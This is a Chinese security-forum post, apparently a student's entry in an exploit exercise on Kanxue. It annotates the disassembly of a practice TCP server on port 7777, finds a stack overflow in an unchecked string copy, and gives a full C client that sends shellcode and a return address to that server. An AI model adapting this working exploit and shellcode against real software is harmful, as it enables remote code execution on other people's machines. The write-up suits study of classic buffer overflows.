能力值:
( LV4,RANK:50 )
|
-
-
2 楼
提交者看雪ID:likunkun
职业:(学生、程序员、安全专家、黑客技术爱好者、其他?)
学生
PE分析:
本程序为一收包程序。
用C++的流显示的内容。
004010B0 /$ 81EC B4030000 sub esp, 3B4
004010B6 |. 8D8424 240200>lea eax, dword ptr [esp+224] ; 初始化socket
004010BD |. 55 push ebp
004010BE |. 50 push eax ; /pWSAData
004010BF |. 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
004010C4 |. FF15 BC804000 call dword ptr [<&WS2_32.#115>] ; \WSAStartup
004010CA |. 6A 00 push 0 ; /Protocol = IPPROTO_IP
004010CC |. 6A 01 push 1 ; |Type = SOCK_STREAM
004010CE |. 6A 02 push 2 ; |Family = AF_INET
004010D0 |. FF15 C0804000 call dword ptr [<&WS2_32.#23>] ; \socket
004010D6 |. 8BE8 mov ebp, eax
004010D8 |. 85ED test ebp, ebp
004010DA |. 7D 33 jge short 0040110F
004010DC |. 68 00914000 push 00409100 ; ASCII "socket creating error!"
004010E1 |. 55 push ebp ; /Arg1
004010E2 |. B9 689A4000 mov ecx, 00409A68 ; |
004010E7 |. E8 0C070000 call 004017F8 ; \exploit_.004017F8
004010EC |. 8BC8 mov ecx, eax
004010EE |. E8 34030000 call 00401427
004010F3 |. 68 D0124000 push 004012D0
004010F8 |. 6A 0A push 0A ; /Arg1 = 0000000A
004010FA |. 8BC8 mov ecx, eax ; |
004010FC |. E8 DF010000 call 004012E0 ; \exploit_.004012E0
00401101 |. 8BC8 mov ecx, eax
00401103 |. E8 A8010000 call 004012B0
00401108 |. 6A 01 push 1
0040110A |. E8 430E0000 call 00401F52 ; 端口号为7777
0040110F |> 68 611E0000 push 1E61 ; /NetShort = 1E61
00401114 |. 66:C74424 0C >mov word ptr [esp+C], 2 ; |
0040111B |. FF15 C4804000 call dword ptr [<&WS2_32.#9>] ; \ntohs
00401121 |. 6A 00 push 0 ; /NetLong = 0
00401123 |. 66:894424 0E mov word ptr [esp+E], ax ; |
00401128 |. FF15 C8804000 call dword ptr [<&WS2_32.#8>] ; \ntohl
0040112E |. 8D4C24 08 lea ecx, dword ptr [esp+8]
00401132 |. 6A 10 push 10 ; /AddrLen = 10 (16.)
00401134 |. 51 push ecx ; |pSockAddr
00401135 |. 55 push ebp ; |Socket
00401136 |. 894424 18 mov dword ptr [esp+18], eax ; |
0040113A |. FF15 CC804000 call dword ptr [<&WS2_32.#2>] ; \bind
00401140 |. 85C0 test eax, eax
00401142 |. 74 24 je short 00401168
00401144 |. 68 E0904000 push 004090E0 ; ASCII "binding stream socket error!"
00401149 |. B9 689A4000 mov ecx, 00409A68
0040114E |. E8 D4020000 call 00401427
00401153 |. 68 D0124000 push 004012D0
00401158 |. 6A 0A push 0A ; /Arg1 = 0000000A
0040115A |. 8BC8 mov ecx, eax ; |
0040115C |. E8 7F010000 call 004012E0 ; \exploit_.004012E0
00401161 |. 8BC8 mov ecx, eax
00401163 |. E8 48010000 call 004012B0
00401168 |> 53 push ebx
00401169 |. 68 B8904000 push 004090B8 ; ASCII "**************************************"
0040116E |. B9 689A4000 mov ecx, 00409A68
00401173 |. E8 AF020000 call 00401427
00401178 |. 68 D0124000 push 004012D0
0040117D |. 6A 0A push 0A ; /Arg1 = 0000000A
0040117F |. 8BC8 mov ecx, eax ; |
00401181 |. E8 5A010000 call 004012E0 ; \exploit_.004012E0
00401186 |. 8BC8 mov ecx, eax
00401188 |. E8 23010000 call 004012B0
0040118D |. 68 94904000 push 00409094 ; ASCII " exploit target server 1.0",TAB," "
00401192 |. B9 689A4000 mov ecx, 00409A68
00401197 |. E8 8B020000 call 00401427
0040119C |. 68 D0124000 push 004012D0
004011A1 |. 6A 0A push 0A ; /Arg1 = 0000000A
004011A3 |. 8BC8 mov ecx, eax ; |
004011A5 |. E8 36010000 call 004012E0 ; \exploit_.004012E0
004011AA |. 8BC8 mov ecx, eax
004011AC |. E8 FF000000 call 004012B0
004011B1 |. 68 B8904000 push 004090B8 ; ASCII "**************************************"
004011B6 |. B9 689A4000 mov ecx, 00409A68
004011BB |. E8 67020000 call 00401427
004011C0 |. 68 D0124000 push 004012D0
004011C5 |. 6A 0A push 0A ; /Arg1 = 0000000A
004011C7 |. 8BC8 mov ecx, eax ; |
004011C9 |. E8 12010000 call 004012E0 ; \exploit_.004012E0
004011CE |. 8BC8 mov ecx, eax
004011D0 |. E8 DB000000 call 004012B0
004011D5 |. 6A 04 push 4 ; /Backlog = 4
004011D7 |. 55 push ebp ; |Socket
004011D8 |. FF15 D0804000 call dword ptr [<&WS2_32.#13>] ; \listen
004011DE |. 8D5424 08 lea edx, dword ptr [esp+8]
004011E2 |. 8D4424 1C lea eax, dword ptr [esp+1C]
004011E6 |. 52 push edx ; /pAddrLen
004011E7 |. 50 push eax ; |pSockAddr
004011E8 |. 55 push ebp ; |Socket
004011E9 |. C74424 14 100>mov dword ptr [esp+14], 10 ; |
004011F1 |. FF15 D4804000 call dword ptr [<&WS2_32.#1>] ; \accept
004011F7 |. 8BD8 mov ebx, eax
004011F9 |. 83FB FF cmp ebx, -1
004011FC |. 74 7F je short 0040127D
004011FE |. 56 push esi
004011FF |. 57 push edi
00401200 |> B9 80000000 /mov ecx, 80
00401205 |. 33C0 |xor eax, eax
00401207 |. 8D7C24 34 |lea edi, dword ptr [esp+34]
0040120B |. 50 |push eax ; /Flags => 0
0040120C |. F3:AB |rep stos dword ptr es:[edi] ; |
0040120E |. 8D4C24 38 |lea ecx, dword ptr [esp+38] ; |
00401212 |. 68 00020000 |push 200 ; |BufSize = 200 (512.)
00401217 |. 51 |push ecx ; |Buffer
00401218 |. 53 |push ebx ; |Socket
00401219 |. FF15 D8804000 |call dword ptr [<&WS2_32.#16>] ; \recv
0040121F |. 8BF0 |mov esi, eax ; 收包
00401221 |. 85F6 |test esi, esi
00401223 |. 7D 26 |jge short 0040124B
00401225 |. 68 74904000 |push 00409074 ; ASCII "reading stream message erro!"
0040122A |. B9 689A4000 |mov ecx, 00409A68
0040122F |. E8 F3010000 |call 00401427
00401234 |. 68 D0124000 |push 004012D0
00401239 |. 6A 0A |push 0A ; /Arg1 = 0000000A
0040123B |. 8BC8 |mov ecx, eax ; |
0040123D |. E8 9E000000 |call 004012E0 ; \exploit_.004012E0
00401242 |. 8BC8 |mov ecx, eax
00401244 |. E8 67000000 |call 004012B0
00401249 |. 33F6 |xor esi, esi
0040124B |> 8D5424 34 |lea edx, dword ptr [esp+34] ; 在这里把收到的数据调用函数显示
0040124F |. 52 |push edx
00401250 |. E8 ABFDFFFF |call 00401000 ; 关键溢出
00401255 |. 83C4 04 |add esp, 4
00401258 |. 85F6 |test esi, esi
0040125A |.^ 75 A4 |jnz short 00401200
0040125C |. 53 |push ebx ; /Socket
0040125D |. FF15 DC804000 |call dword ptr [<&WS2_32.#3>] ; \closesocket
00401263 |. 8D4424 10 |lea eax, dword ptr [esp+10]
00401267 |. 8D4C24 24 |lea ecx, dword ptr [esp+24]
0040126B |. 50 |push eax ; /pAddrLen
0040126C |. 51 |push ecx ; |pSockAddr
0040126D |. 55 |push ebp ; |Socket
0040126E |. FF15 D4804000 |call dword ptr [<&WS2_32.#1>] ; \accept
00401274 |. 8BD8 |mov ebx, eax
00401276 |. 83FB FF |cmp ebx, -1 ; 循环接收
收包之后调用函数并显示出来。
关键溢出函数是在显示的时候即:
0040124B |> \8D5424 34 |lea edx, dword ptr [esp+34]
0040124F |. 52 |push edx
00401250 |. E8 ABFDFFFF |call 00401000
00401000 /$ 81EC C8000000 sub esp, 0C8
00401006 |. 83C9 FF or ecx, FFFFFFFF
00401009 |. 33C0 xor eax, eax
0040100B |. 8D5424 00 lea edx, dword ptr [esp]
0040100F |. 56 push esi
00401010 |. 57 push edi
00401011 |. 8BBC24 D40000>mov edi, dword ptr [esp+D4]
00401018 |. 68 4C904000 push 0040904C ; ASCII "********************"
0040101D |. F2:AE repne scas byte ptr es:[edi] ; 扫描字串
0040101F |. F7D1 not ecx
00401021 |. 2BF9 sub edi, ecx ; 恢复指针
00401023 |. 8BC1 mov eax, ecx
00401025 |. 8BF7 mov esi, edi
00401027 |. 8BFA mov edi, edx
00401029 |. C1E9 02 shr ecx, 2
0040102C |. F3:A5 rep movs dword ptr es:[edi], dword p>; 字串复制
0040102E |. 8BC8 mov ecx, eax ; 字串复制
00401030 |. 83E1 03 and ecx, 3 ; 字串复制
00401033 |. F3:A4 rep movs byte ptr es:[edi], byte ptr>; 可以在这里溢出覆盖返回值
下面即为显示代码,这里不列出
测试程序为:
#include <Winsock2.h>
#include <stdio.h>
char shellcode[] =
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x31\x31\x31\x31\x31\x31\x31\x31"
"\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31"
"\x31\x31\x31\x31\x31\x31\x31\x31\xa4\x10\x40\x00";
void main()
{
WORD wVersionRequested;
WSADATA wsaData;
int err;
wVersionRequested = MAKEWORD( 1, 1 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
return;
}
if ( LOBYTE( wsaData.wVersion ) != 1 ||
HIBYTE( wsaData.wVersion ) != 1 ) {
WSACleanup( );
return;
}
SOCKET sockClient=socket(AF_INET,SOCK_STREAM,0);
SOCKADDR_IN addrSrv;
addrSrv.sin_addr.S_un.S_addr=inet_addr("192.168.1.1");
addrSrv.sin_family=AF_INET;
addrSrv.sin_port=htons(7777);
connect(sockClient,(SOCKADDR*)&addrSrv,sizeof(SOCKADDR));
send(sockClient,shellcode,sizeof(shellcode),0);
closesocket(sockClient);
WSACleanup();
}
漏洞描述:
在显示字符的时候有一个复制字串的操作,可以覆盖返回值。
shellcode描述:
请注明shellcode来源:原创,修改,引用。
原创请给出开发说明
修改请给出修改说明,并注明出处,附加被引用代码
引用请给出功能描述,并注明出处,附加被引用代码
shellcode用的failwest的
exploit运行截图
我电脑里有HOOK在我同学的电脑里
稳定性与通用性论证
在有的电脑中有的软件已经HOOKLoadlibrary的时候会出现问题
现在不知道是谁HOOK的
创新性论证(可选)
使用了retn地址的返回值。
|
